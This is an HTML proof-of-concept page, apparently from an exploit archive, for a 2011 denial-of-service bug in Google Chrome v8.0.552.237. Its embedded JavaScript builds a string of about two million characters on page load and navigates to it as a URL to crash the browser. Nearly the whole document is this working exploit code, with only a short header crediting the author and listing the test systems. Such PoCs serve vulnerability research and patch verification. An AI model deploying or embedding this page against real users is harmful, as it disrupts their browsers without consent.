69 lines
No EOL
816 B
HTML
69 lines
No EOL
816 B
HTML
<html>
|
|
<head>
|
|
|
|
|
|
# Title: Google Chrome v8.0.552.237 address overflow DoS
|
|
|
|
# CVE-ID: ()
|
|
|
|
# OSVDB-ID: ()
|
|
|
|
# Author: Vuk Ivanovic
|
|
|
|
# Published: 2011-01-17
|
|
|
|
# Verified: yes
|
|
|
|
|
|
# Google Chrome v8.0.552.237 address overflow DoS
|
|
|
|
|
|
#
|
|
# Tested on: Windows XP, SP2 (EN), Windows 7 x64
|
|
|
|
#
|
|
# Date tested: 01/16/2011
|
|
#
|
|
#
|
|
#
|
|
|
|
# Discovered by: Vuk Ivanovic(musashi42)
|
|
#
|
|
##
|
|
|
|
<script type="text/javascript">
|
|
|
|
function mul3 (str, num) {
|
|
if (!num) return "";
|
|
var orig = str,
|
|
soFar = [str],
|
|
added = 1,
|
|
left, i;
|
|
while (added < num) {
|
|
left = num - added;
|
|
str = orig;
|
|
for (i = 2; i < left; i *= 2) {
|
|
str += str;
|
|
}
|
|
soFar.push(str);
|
|
added += (i / 2);
|
|
}
|
|
return soFar.join("");
|
|
|
|
}
|
|
|
|
var junka = "a";
|
|
|
|
var junk = mul3(junka,2097033);
|
|
|
|
|
|
window.location.href = "http://" + junk;
|
|
|
|
|
|
</script>
|
|
</head>
|
|
|
|
<body>
|
|
|
|
</body>
|
|
</html> |